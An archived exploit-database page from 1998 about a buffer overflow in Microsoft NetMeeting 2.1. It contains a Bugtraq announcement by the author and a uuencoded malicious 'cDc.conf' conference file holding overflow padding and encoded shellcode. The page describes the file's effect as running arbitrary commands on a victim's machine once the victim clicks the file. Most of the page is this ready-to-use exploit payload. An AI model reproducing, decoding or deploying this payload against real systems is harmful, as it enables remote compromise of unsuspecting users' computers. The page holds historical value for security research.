Overflow in Microsoft Netmeeting
Description: | Standard overflow |
Author: | DilDog <dildog@L0PHT.COM> |
Compromise: | remotely execute arbitrary commands on the machine of a windows/netmeeting user (the user must click on your neetmeeting .conf file) |
Vulnerable Systems: | Windows boxes running Micro$oft Netmeeting V. 2.1 |
Date: | 16 April 1998 |
Notes: | For a lot more information on this exploit, including a short windows overflow tutorial, see http://www.cultdeadcow.com/cDc_files/cDc-351/ . |
Date: Thu, 16 Apr 1998 16:27:13 -0500
From: DilDog <dildog@L0PHT.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: The Tao of Windows Buffer Overflow
Boys, girls, lepers, and lost souls,
Venture your browsers to http://204.57.138.9/ (www.cultdeadcow.com)
There exists cDc t-file #351, an extensive document detailing on the 'The
Tao of Windows Buffer Overflow'. It relates a buffer overflow in
Microsoft Netmeeting 2.1, in the parlance of a street thug and with the
grace of a one-legged ostrich. In short, even yo momma could understand
it. Get it.
It tells you what you need to know, and then some.
-- DilDog
cDc Ninja Strike Force
begin 600 cDc.conf
M6T-O;F9E<F5N8V53:&]R=&-U=%T-"D-O;F9.86UE/65X<&QO9&4-"D%D9')E
M<W,]/BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXQ,C,T=BI@
M:I"0D)"0D)"0D)`SR;B`4_]C+(#!P!BQM$B`,(#B^KY\$&!J4%#_%HOP6XO[
M9H'O2__\,\F`Z?I#,L#7A,!U^$-14U;_%7@08&JK6>+J0S+`UX3`=?A#4U/_
M%7P08&J+\)"0D)`SR8/I_$,RP->$P'7X0U%35O\5>!!@:JM9XNJ0D#/`9DC1
MX#/24%+_5^R+\#/24E)24E?_5_`STE)24I!2B]>#ZE"0D)!24/]7^%<STF9*
MT>)25E#_5_R0D)`STE*+UX/J,$*0D%+_5]C_-U90B]C_5]Q3_U?@D)"0,])"
M4HO7@^HP0I"04O]7Y)"0D/]7Z,S,S"TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
M+<O%TL[%S+.R@-_LX_+EX?2`W^SW\NGTY8#?[./L[_/E@-?I[L7XY>.`Q?CI
M]-#R[^/E\_.`Q^SOXN'LP>SL[^.`U\G.R<[%U(#)[O3E\N[E],_PY>[!@,GN
M].7R[N7TP^SO\^7(X>[D[.6`R>[TY?+NY?3/\.7NU?+LP8#)[O3E\N[E]-+E
MX>3&Z>SE@.CT]/"ZKZ_W]_>N[+#PZ/2NX^_MK_[DZ>SD[^>OY>'T[>6NY?CE
M@#P-"D-A;&Q&;&%G<STV-34T,PT*5')A;G-P;W)T/3,R-S8W#0H-"@T*#0H-
)"@T*#0H-"@T*
`
end
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: